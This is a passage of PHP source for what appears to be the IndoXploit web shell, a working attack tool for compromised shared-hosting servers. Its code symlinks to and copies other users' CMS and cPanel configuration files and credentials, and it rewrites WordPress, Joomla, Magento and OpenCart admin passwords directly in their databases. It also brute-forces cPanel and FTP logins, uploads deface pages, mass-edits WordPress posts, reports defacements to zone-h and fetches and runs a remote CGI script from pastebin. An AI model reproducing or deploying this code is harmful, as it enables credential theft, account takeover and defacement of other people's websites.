Vzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";$file = "idx_config/vhost.cin";$handle = fopen($file ,"w+");fwrite($handle ,base64_decode($vhost));fclose($handle);chmod($file, 0755);if(exe("cd idx_config && ./vhost.cin")) {echo "
Done
";} else {echo "
Done
";}} else {$etc = fopen("/etc/passwd", "r") or die("
Can't read /etc/passwd
");while($passwd = fgets($etc)) {if($passwd == "" || !$etc) {echo "Can't read /etc/passwd";} else {preg_match_all('/(.*?):x:/', $passwd, $user_config);foreach($user_config[1] as $user_idx) {$user_config_dir = "/home/$user_idx/public_html/";if(is_readable($user_config_dir)) {$grab_config = array("/home/$user_idx/.my.cnf" => "cpanel","/home/$user_idx/.accesshash" => "WHM-accesshash","$user_config_dir/po-content/config.php" => "Popoji","$user_config_dir/vdo_config.php" => "Voodoo","$user_config_dir/bw-configs/config.ini" => "BosWeb","$user_config_dir/config/koneksi.php" => "Lokomedia","$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia","$user_config_dir/clientarea/configuration.php" => "WHMCS","$user_config_dir/whm/configuration.php" => "WHMCS","$user_config_dir/whmcs/configuration.php" => "WHMCS","$user_config_dir/forum/config.php" => "phpBB","$user_config_dir/sites/default/settings.php" => "Drupal","$user_config_dir/config/settings.inc.php" => "PrestaShop","$user_config_dir/app/etc/local.xml" => "Magento","$user_config_dir/joomla/configuration.php" => "Joomla","$user_config_dir/configuration.php" => "Joomla","$user_config_dir/wp/wp-config.php" => "WordPress","$user_config_dir/wordpress/wp-config.php" => "WordPress","$user_config_dir/wp-config.php" => "WordPress","$user_config_dir/admin/config.php" => "OpenCart","$user_config_dir/slconfig.php" => "Sitelok","$user_config_dir/application/config/database.php" => "Ellislab");foreach($grab_config as $config => $nama_config) {$ambil_config = file_get_contents($config);if($ambil_config == '') {} else {$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");fputs($file_config,$ambil_config);}}}}}}echo "
Done
";}} elseif($_GET['do'] == 'jumping') {$i = 0;echo "
";if(preg_match("/hsphere/", $dir)) {$urls = explode("rn", $_POST['url']);if(isset($_POST['jump'])) {echo "
";foreach($urls as $url) {$url = str_replace(array("http://","www."), "", strtolower($url));$etc = "/etc/passwd";$f = fopen($etc,"r");while($gets = fgets($f)) {$pecah = explode(":", $gets);$user = $pecah[0];$dir_user = "/hsphere/local/home/$user";if(is_dir($dir_user) === true) {$url_user = $dir_user."/".$url;if(is_readable($url_user)) {$i++;$jrw = "[R] $url_user";if(is_writable($url_user)) {$jrw = "[RW] $url_user";}echo $jrw."
";}}}}if($i == 0) { } else {echo "
Total ada ".$i." Kamar di ".$ip;}echo "
";} else {echo '
List Domains:

';}} elseif(preg_match("/vhosts|vhost/", $dir)) {preg_match("//var/www/(.*?)//", $dir, $vh);$urls = explode("rn", $_POST['url']);if(isset($_POST['jump'])) {echo "
";foreach($urls as $url) {$url = str_replace("www.", "", $url);$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";if(is_dir($web_vh) === true) {if(is_readable($web_vh)) {$i++;$jrw = "[R] $web_vh";if(is_writable($web_vh)) {$jrw = "[RW] $web_vh";}echo $jrw."
";}}}if($i == 0) { } else {echo "
Total ada ".$i." Kamar di ".$ip;}echo "
";} else {echo '
List Domains:

';}} else {echo "
";$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");while($passwd = fgets($etc)) {if($passwd == '' || !$etc) {echo "Can't read /etc/passwd";} else {preg_match_all('/(.*?):x:/', $passwd, $user_jumping);foreach($user_jumping[1] as $user_idx_jump) {$user_jumping_dir = "/home/$user_idx_jump/public_html";if(is_readable($user_jumping_dir)) {$i++;$jrw = "[R] $user_jumping_dir";if(is_writable($user_jumping_dir)) {$jrw = "[RW] $user_jumping_dir";}echo $jrw;if(function_exists('posix_getpwuid')) {$domain_jump = file_get_contents("/etc/named.conf");if($domain_jump == '') {echo " => ( gabisa ambil nama domain nya )
";} else {preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);foreach($domains_jump[1] as $dj) {$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));$user_jumping_url = $user_jumping_url['name'];if($user_jumping_url == $user_idx_jump) {echo " => ( $dj )
";break;}}}} else {echo "
";}}}}}if($i == 0) { } else {echo "
Total ada ".$i." Kamar di ".$ip;}echo "
";}echo "
";} elseif($_GET['do'] == 'auto_edit_user') {if($_POST['hajar']) {if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {echo "username atau password harus lebih dari 6 karakter";} else {$user_baru = $_POST['user_baru'];$pass_baru = md5($_POST['pass_baru']);$conf = $_POST['config_dir'];$scan_conf = scandir($conf);foreach($scan_conf as $file_conf) {if(!is_file("$conf/$file_conf")) continue;$config = file_get_contents("$conf/$file_conf");if(preg_match("/JConfig|joomla/",$config)) {$dbhost = ambilkata($config,"host = '","'");$dbuser = ambilkata($config,"user = '","'");$dbpass = ambilkata($config,"password = '","'");$dbname = ambilkata($config,"db = '","'");$dbprefix = ambilkata($config,"dbprefix = '","'");$prefix = $dbprefix."users";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");$result = mysql_fetch_array($q);$id = $result['id'];$site = ambilkata($config,"sitename = '","'");$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");echo "Config => ".$file_conf."
";echo "CMS => Joomla
";if($site == '') {echo "Sitename => error, gabisa ambil nama domain nya
";} else {echo "Sitename => $site
";}if(!$update OR !$conn OR !$db) {echo "Status => ".mysql_error()."

";} else {echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";}mysql_close($conn);} elseif(preg_match("/WordPress/",$config)) {$dbhost = ambilkata($config,"DB_HOST', '","'");$dbuser = ambilkata($config,"DB_USER', '","'");$dbpass = ambilkata($config,"DB_PASSWORD', '","'");$dbname = ambilkata($config,"DB_NAME', '","'");$dbprefix = ambilkata($config,"table_prefix = '","'");$prefix = $dbprefix."users";$option = $dbprefix."options";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");$result = mysql_fetch_array($q);$id = $result[ID];$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");$result2 = mysql_fetch_array($q2);$target = $result2[option_value];if($target == '') {$url_target = "Login => error, gabisa ambil nama domain nyaa
";} else {$url_target = "Login => $target/wp-login.php
";}$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");echo "Config => ".$file_conf."
";echo "CMS => Wordpress
";echo $url_target;if(!$update OR !$conn OR !$db) {echo "Status => ".mysql_error()."

";} else {echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";}mysql_close($conn);} elseif(preg_match("/Magento|Mage_Core/",$config)) {$dbhost = ambilkata($config,"");$dbuser = ambilkata($config,"");$dbpass = ambilkata($config,"");$dbname = ambilkata($config,"");$dbprefix = ambilkata($config,"");$prefix = $dbprefix."admin_user";$option = $dbprefix."core_config_data";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");$result = mysql_fetch_array($q);$id = $result[user_id];$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");$result2 = mysql_fetch_array($q2);$target = $result2[value];if($target == '') {$url_target = "Login => error, gabisa ambil nama domain nyaa
";} else {$url_target = "Login => $target/admin/
";}$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");echo "Config => ".$file_conf."
";echo "CMS => Magento
";echo $url_target;if(!$update OR !$conn OR !$db) {echo "Status => ".mysql_error()."

";} else {echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";}mysql_close($conn);} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");$dbuser = ambilkata($config,"'DB_USERNAME', '","'");$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");$dbname = ambilkata($config,"'DB_DATABASE', '","'");$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");$prefix = $dbprefix."user";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");$result = mysql_fetch_array($q);$id = $result[user_id];$target = ambilkata($config,"HTTP_SERVER', '","'");if($target == '') {$url_target = "Login => error, gabisa ambil nama domain nyaa
";} else {$url_target = "Login => $target
";}$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");echo "Config => ".$file_conf."
";echo "CMS => OpenCart
";echo $url_target;if(!$update OR !$conn OR !$db) {echo "Status => ".mysql_error()."

";} else {echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";}mysql_close($conn);} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {$dbhost = ambilkata($config,'server = "','"');$dbuser = ambilkata($config,'username = "','"');$dbpass = ambilkata($config,'password = "','"');$dbname = ambilkata($config,'database = "','"');$prefix = "users";$option = "identitas";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");$result = mysql_fetch_array($q);$target = $result[alamat_website];if($target == '') {$target2 = $result[url];$url_target = "Login => error, gabisa ambil nama domain nyaa
";if($target2 == '') {$url_target2 = "Login => error, gabisa ambil nama domain nyaa
";} else {$cek_login3 = file_get_contents("$target2/adminweb/");$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {$url_target2 = "Login => $target2/adminweb
";} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {$url_target2 = "Login => $target2/lokomedia/adminweb
";} else {$url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
";}}} else {$cek_login = file_get_contents("$target/adminweb/");$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {$url_target = "Login => $target/adminweb
";} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {$url_target = "Login => $target/lokomedia/adminweb
";} else {$url_target = "Login => $target [ gatau admin login nya dimana :p ]
";}}$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");echo "Config => ".$file_conf."
";echo "CMS => Lokomedia
";if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {echo $url_target2;} else {echo $url_target;}if(!$update OR !$conn OR !$db) {echo "Status => ".mysql_error()."

";} else {echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

";}mysql_close($conn);}}}} else {echo "

Auto Edit User Config

DIR Config:


Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";}} elseif($_GET['do'] == 'cpanel') {if($_POST['crack']) {$usercp = explode("rn", $_POST['user_cp']);$passcp = explode("rn", $_POST['pass_cp']);$i = 0;foreach($usercp as $ucp) {foreach($passcp as $pcp) {if(@mysql_connect('localhost', $ucp, $pcp)) {if($_SESSION[$ucp] && $_SESSION[$pcp]) {} else {$_SESSION[$ucp] = "1";$_SESSION[$pcp] = "1";if($ucp == '' || $pcp == '') {} else {$i++;if(function_exists('posix_getpwuid')) {$domain_cp = file_get_contents("/etc/named.conf");if($domain_cp == '') {$dom = "gabisa ambil nama domain nya";} else {preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);foreach($domains_cp[1] as $dj) {$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));$user_cp_url = $user_cp_url['name'];if($user_cp_url == $ucp) {$dom = "$dj";break;}}}} else {$dom = "function is Disable by system";}echo "username ($ucp) password ($pcp) domain ($dom)
";}}}}}if($i == 0) {} else {echo "
sukses nyolong ".$i." Cpanel by IndoXploit.";}} else {echo "
USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";}} elseif($_GET['do'] == 'cpftp_auto') {if($_POST['crack']) {$usercp = explode("rn", $_POST['user_cp']);$passcp = explode("rn", $_POST['pass_cp']);$i = 0;foreach($usercp as $ucp) {foreach($passcp as $pcp) {if(@mysql_connect('localhost', $ucp, $pcp)) {if($_SESSION[$ucp] && $_SESSION[$pcp]) {} else {$_SESSION[$ucp] = "1";$_SESSION[$pcp] = "1";if($ucp == '' || $pcp == '') {//} else {echo "[+] username ($ucp) password ($pcp)
";$ftp_conn = ftp_connect($ip);$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);if((!$ftp_login) || (!$ftp_conn)) {echo "[+] Login Gagal

";} else {echo "[+] Login Sukses
";$fi = htmlspecialchars($_POST['file_deface']);$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);if($deface) {$i++;echo "[+] Deface Sukses
";if(function_exists('posix_getpwuid')) {$domain_cp = file_get_contents("/etc/named.conf");if($domain_cp == '') {echo "[+] gabisa ambil nama domain nya

";} else {preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);foreach($domains_cp[1] as $dj) {$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));$user_cp_url = $user_cp_url['name'];if($user_cp_url == $ucp) {echo "[+] http://$dj/$fi

";break;}}}} else {echo "[+] gabisa ambil nama domain nya

";}} else {echo "[-] Deface Gagal

";}}//echo "username ($ucp) password ($pcp)
";}}}}}if($i == 0) {} else {echo "
sukses deface ".$i." Cpanel by IndoXploit.";}} else {echo "
Filename:

Deface Page:

USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";}} elseif($_GET['do'] == 'smtp') {echo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

";function scj($dir) {$dira = scandir($dir);foreach($dira as $dirb) {if(!is_file("$dir/$dirb")) continue;$ambil = file_get_contents("$dir/$dirb");$ambil = str_replace("$", "", $ambil);if(preg_match("/JConfig|joomla/", $ambil)) {$smtp_host = ambilkata($ambil,"smtphost = '","'");$smtp_auth = ambilkata($ambil,"smtpauth = '","'");$smtp_user = ambilkata($ambil,"smtpuser = '","'");$smtp_pass = ambilkata($ambil,"smtppass = '","'");$smtp_port = ambilkata($ambil,"smtpport = '","'");$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");echo "SMTP Host: $smtp_host
";echo "SMTP port: $smtp_port
";echo "SMTP user: $smtp_user
";echo "SMTP pass: $smtp_pass
";echo "SMTP auth: $smtp_auth
";echo "SMTP secure: $smtp_secure

";}}}$smpt_hunter = scj($dir);echo $smpt_hunter;} elseif($_GET['do'] == 'auto_wp') {if($_POST['hajar']) {$title = htmlspecialchars($_POST['new_title']);$pn_title = str_replace(" ", "-", $title);if($_POST['cek_edit'] == "Y") {$script = $_POST['edit_content'];} else {$script = $title;}$conf = $_POST['config_dir'];$scan_conf = scandir($conf);foreach($scan_conf as $file_conf) {if(!is_file("$conf/$file_conf")) continue;$config = file_get_contents("$conf/$file_conf");if(preg_match("/WordPress/", $config)) {$dbhost = ambilkata($config,"DB_HOST', '","'");$dbuser = ambilkata($config,"DB_USER', '","'");$dbpass = ambilkata($config,"DB_PASSWORD', '","'");$dbname = ambilkata($config,"DB_NAME', '","'");$dbprefix = ambilkata($config,"table_prefix = '","'");$prefix = $dbprefix."posts";$option = $dbprefix."options";$conn = mysql_connect($dbhost,$dbuser,$dbpass);$db = mysql_select_db($dbname);$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");$result = mysql_fetch_array($q);$id = $result[ID];$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");$result2 = mysql_fetch_array($q2);$target = $result2[option_value];$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");echo "
";if($target == '') {echo "URL: error, gabisa ambil nama domain nya -> ";} else {echo "URL: $target/?p=$id -> ";}if(!$update OR !$conn OR !$db) {echo "MySQL Error: ".mysql_error()."
";} else {echo "sukses di ganti.
";}echo "
";mysql_close($conn);}}} else {echo "

Auto Edit Title+Content WordPress

DIR Config:


Set Title:


Edit Content?: YN
Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";}} elseif($_GET['do'] == 'zoneh') {if($_POST['submit']) {$domain = explode("rn", $_POST['url']);$nick = $_POST['nick'];echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
";echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

";function zoneh($url,$nick) {$ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");return curl_exec($ch); curl_close($ch);}foreach($domain as $url) {$zoneh = zoneh($url,$nick);if(preg_match("/color="red">OK/i", $zoneh)) {echo "$url -> OK
";} else {echo "$url -> ERROR
";}}} else {echo "
Defacer:

Domains:

";}echo "
";} elseif($_GET['do'] == 'cgi') {$cgi_dir = mkdir('idx_cgi', 0755);$file_cgi = "idx_cgi/cgi.izo";$isi_htcgi = "AddHandler cgi-script .izo";$htcgi = fopen(".htaccess", "w");fwrite($htcgi, $isi_htcgi);fclose($htcgi);$cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");$cgi = fopen($file_cgi, "w");fwrite($cgi, $cgi_script);fclose($cgi);chmod($file_cgi, 0755);echo "";} elseif($_GET['do'] == 'fake_root') {ob_start();$cwd = getcwd();$ambil_user = explode("/", $cwd);$user = $ambil_user[2];if($_POST['reverse']) {$site = explode("rn", $_POST['url']);$file = $_POST['file'];foreach($site as $url) {$cek = getsource("$url/~$user/$file");if(preg_match("/hacked/i", $cek)) {echo "URL: $url/~$user/$file -> Fake Root!
";}}} else {echo "
Filename:

User:

Domain:


NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
";}} elseif($_GET['do'] == 'adminer') {$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);function adminer($url, $isi) {$fp = fopen($isi, "w");$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp);return curl_exec($ch); curl_close($ch);fclose($fp);ob_flush();flush();}if(file_exists('adminer.php')) {echo "
-> adminer login <-
";} else {if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {echo "
-> adminer login <-
";} else {echo "
gagal buat file adminer
";}}} elseif($_GET['do'] == 'auto_dwp') {if($_POST['auto_deface_wp']) {function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true);$data = curl_exec($ch); curl_close($ch);return $data;}function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", );$ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 